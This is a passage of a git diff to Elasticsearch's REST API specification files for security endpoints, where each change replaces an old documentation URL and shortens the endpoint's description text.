"stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json index 533473743f02a..8b85099ad7a07 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_privileges.json @@ -1,8 +1,8 @@ { "security.delete_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-privilege.html", - "description":"Removes application privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-privileges", + "description":"Delete application privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json index 65b2495f01995..abcb6c9ea54bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role.json @@ -1,8 +1,8 @@ { "security.delete_role":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-role.html", - "description":"Removes roles in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-role", + "description":"Delete roles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json index ac73fb4d7ccbb..c19c283a475fa 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_role_mapping.json @@ -1,8 +1,8 @@ { "security.delete_role_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-role-mapping.html", - "description":"Removes role mappings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-role-mapping", + "description":"Delete role mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json index 4da3ec30b5ce7..0c24e6e3d22af 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_service_token.json @@ -1,8 +1,8 @@ { "security.delete_service_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-service-token.html", - "description":"Deletes a service account token." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-service-token", + "description":"Delete service account tokens" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json index 2c7e1091a0e82..54e1bc07e0dbe 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.delete_user.json @@ -1,8 +1,8 @@ { "security.delete_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-delete-user.html", - "description":"Deletes users from the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-delete-user", + "description":"Delete users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json index 0dead4d592d96..f7413181f27e0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user.json @@ -1,8 +1,8 @@ { "security.disable_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-disable-user.html", - "description":"Disables users in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-disable-user", + "description":"Disable users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json index 77e8744f03056..0402d658c6852 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.disable_user_profile.json @@ -1,8 +1,8 @@ { "security.disable_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-disable-user-profile.html", - "description":"Disables a user profile so it's not visible in user profile searches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-disable-user-profile", + "description":"Disable a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json index 6218a04c9ae06..565cab13de39e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user.json @@ -1,8 +1,8 @@ { "security.enable_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-enable-user.html", - "description":"Enables users in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enable-user", + "description":"Enable users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json index 1b42ec401440f..58b939042686f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enable_user_profile.json @@ -1,8 +1,8 @@ { "security.enable_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-enable-user-profile.html", - "description":"Enables a user profile so it's visible in user profile searches." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enable-user-profile", + "description":"Enable a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json index b3e961d64df6e..49bd75777bd0c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_kibana.json @@ -1,8 +1,8 @@ { "security.enroll_kibana":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-kibana-enrollment.html", - "description":"Allows a kibana instance to configure itself to communicate with a secured elasticsearch cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enroll-kibana", + "description":"Enroll Kibana" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json index 17b88859033b4..f047ef728941c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.enroll_node.json @@ -1,8 +1,8 @@ { "security.enroll_node":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/security-api-node-enrollment.html", - "description":"Allows a new node to enroll to an existing cluster with security enabled." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-enroll-node", + "description":"Enroll a node" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json index 4df007a072bf1..679c60ce89291 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_api_key.json @@ -1,8 +1,8 @@ { "security.get_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-api-key.html", - "description":"Retrieves information for one or more API keys." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-api-key", + "description":"Get API key information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json index 96ab86a613bad..f2fff0a5e8ccf 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_builtin_privileges.json @@ -1,8 +1,8 @@ { "security.get_builtin_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-builtin-privileges.html", - "description":"Retrieves the list of cluster privileges and index privileges that are available in this version of Elasticsearch." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-builtin-privileges", + "description":"Get builtin privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json index 278e8ad2b2e1c..f9d612f557e75 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_privileges.json @@ -1,8 +1,8 @@ { "security.get_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-privileges.html", - "description":"Retrieves application privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-privileges", + "description":"Get application privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json index d5a583f0dda98..7f8fb60e9f396 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role.json @@ -1,8 +1,8 @@ { "security.get_role":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-role.html", - "description":"Retrieves roles in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-role", + "description":"Get roles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json index 88a2f33d22876..6eef7de6a819b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_role_mapping.json @@ -1,8 +1,8 @@ { "security.get_role_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-role-mapping.html", - "description":"Retrieves role mappings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-role-mapping", + "description":"Get role mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json index 019fdddd7f17c..38e638a8bcfb4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_accounts.json @@ -1,8 +1,8 @@ { "security.get_service_accounts":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-service-accounts.html", - "description":"Retrieves information about service accounts." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-service-accounts", + "description":"Get service accounts" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json index d3668cbabc8ef..a77225499c03c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_service_credentials.json @@ -1,8 +1,8 @@ { "security.get_service_credentials":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-service-credentials.html", - "description":"Retrieves information of all service credentials for a service account." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-service-credentials", + "description":"Get service account credentials" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json index 6339d8a6dee9c..2bb8b3a595374 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_settings.json @@ -1,8 +1,8 @@ { "security.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-settings.html", - "description":"Retrieve settings for the security system indices" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-settings", + "description":"Get security index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json index 356391a61b5d4..d33eac18b9572 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_token.json @@ -1,8 +1,8 @@ { "security.get_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-token.html", - "description":"Creates a bearer token for access without requiring basic authentication." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-token", + "description":"Get a token" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json index 4545d932e6956..6516b70a7e9a5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user.json @@ -1,8 +1,8 @@ { "security.get_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-user.html", - "description":"Retrieves information about users in the native realm and built-in users." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user", + "description":"Get users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json index a67a327b71f30..fa746abeb22be 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_privileges.json @@ -1,8 +1,8 @@ { "security.get_user_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-user-privileges.html", - "description":"Retrieves security privileges for the logged in user." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user-privileges", + "description":"Get user privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json index 7ba652b9bd74b..f378decda09cb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.get_user_profile.json @@ -1,8 +1,8 @@ { "security.get_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-get-user-profile.html", - "description":"Retrieves user profiles for the given unique ID(s)." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-get-user-profile", + "description":"Get a user profile" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json index f3cc37bd7450e..e24e3cf357dd1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.grant_api_key.json @@ -1,8 +1,8 @@ { "security.grant_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-grant-api-key.html", - "description":"Creates an API key on behalf of another user." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-grant-api-key", + "description":"Grant an API key" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json index 3e6efeb1c2e51..3b66c470846fd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges.json @@ -1,8 +1,8 @@ { "security.has_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-has-privileges.html", - "description":"Determines whether the specified user has a specified list of privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-has-privileges", + "description":"Check user privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json index 8152170ac939a..66e23de3f56ca 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.has_privileges_user_profile.json @@ -1,8 +1,8 @@ { "security.has_privileges_user_profile":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-has-privileges-user-profile.html", - "description":"Determines whether the users associated with the specified profile IDs have all the requested privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-has-privileges-user-profile", + "description":"Check user profile privileges" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json index bdf33859d03c0..5618faf0cbf77 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_api_key.json @@ -1,8 +1,8 @@ { "security.invalidate_api_key":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-invalidate-api-key.html", - "description":"Invalidates one or more API keys." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-invalidate-api-key", + "description":"Invalidate API keys" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json index cf4b56a4e2f07..20dc23f1234b2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.invalidate_token.json @@ -1,8 +1,8 @@ { "security.invalidate_token":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-invalidate-token.html", - "description":"Invalidates one or more access tokens or refresh tokens." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-invalidate-token", + "description":"Invalidate a token" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json index 969f5e350705f..5ef393cf64d36 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_authenticate.json @@ -1,8 +1,8 @@ { "security.oidc_authenticate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-oidc-authenticate.html", - "description":"Exchanges an OpenID Connection authentication response message for an Elasticsearch access token and refresh token pair" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-oidc-authenticate", + "description":"Authenticate OpenID Connect" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json index 83f16e5c4de6c..29b07956b62d9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_logout.json @@ -1,8 +1,8 @@ { "security.oidc_logout":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-oidc-logout.html", - "description":"Invalidates a refresh token and access token that was generated from the OpenID Connect Authenticate API" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-oidc-logout", + "description":"Logout of OpenID Connect" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json index fed4897037435..d1b8727f8caa7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.oidc_prepare_authentication.json @@ -1,8 +1,8 @@ { "security.oidc_prepare_authentication":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-oidc-prepare-authentication.html", - "description":"Creates an OAuth 2.0 authentication request as a URL string" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-oidc-prepare-authentication", + "description":"Prepare OpenID connect authentication" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json index 8c920e10f285b..63f235c41c31d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_privileges.json @@ -1,8 +1,8 @@ { "security.put_privileges":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-privileges.html", - "description":"Adds or updates application privileges." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-privileges", + "description":"Create or update application privileges" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json index 687bbe561390d..5c09d59be45b1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role.json @@ -1,8 +1,8 @@ { "security.put_role":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-role.html", - "description":"Adds and updates roles in the native realm." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-role", + "description":"Create or update roles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json index 12c7e8b1b722c..3d3a8762099ea 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_role_mapping.json @@ -1,8 +1,8 @@ { "security.put_role_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-role-mapping.html", - "description":"Creates and updates role mappings." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-role-mapping", + "description":"Create or update role mappings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json index a3a170b2ecf0b..68b8332f8ecf7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.put_user.json @@ -1,8 +1,8 @@ { "security.put_user":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-put-user.html", - "description":"Adds and updates users in the native realm. These users are commonly referred to as native users." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-put-user", + "description":"Create or update users" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json index de95f76ad49db..720ed55ffd252 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_api_keys.json @@ -1,8 +1,8 @@ { "security.query_api_keys":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-query-api-key.html", - "description":"Retrieves information for API keys using a subset of query DSL" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-query-api-keys", + "description":"Find API keys with a query" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json index d9f9d9f45ff69..4b41fb079ffc6 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_role.json @@ -1,8 +1,8 @@ { "security.query_role": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-query-role.html", - "description": "Retrieves information for Roles using a subset of query DSL" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-query-role", + "description": "Find roles with a query" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json index 9793e424e6f52..6173ec374c510 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.query_user.json @@ -1,8 +1,8 @@ { "security.query_user": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-query-user.html", - "description": "Retrieves information for Users using a subset of query DSL" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-query-user", + "description": "Find users with a query" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json index e1247d87319ea..67b4de67e2539 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_authenticate.json @@ -1,8 +1,8 @@ { "security.saml_authenticate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-authenticate.html", - "description":"Exchanges a SAML Response message for an Elasticsearch access token and refresh token pair" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-authenticate", + "description":"Authenticate SAML" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json index 8a17b7a81c107..106973088c27f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_complete_logout.json @@ -1,8 +1,8 @@ { "security.saml_complete_logout":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-complete-logout.html", - "description":"Verifies the logout response sent from the SAML IdP" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-complete-logout", + "description":"Logout of SAML completely" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json index c18c338817901..2f523f9787157 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_invalidate.json @@ -1,8 +1,8 @@ { "security.saml_invalidate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/security-api-saml-invalidate.html", - "description":"Consumes a SAML LogoutRequest" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-saml-invalidate", + "description":"Invalidate SAML" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json index 148805b16a853..3415cd92d836e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/security.saml_logout.json @@ -1,8 +1,8 @@ { "security.saml_logout":{ "documentation":{ - 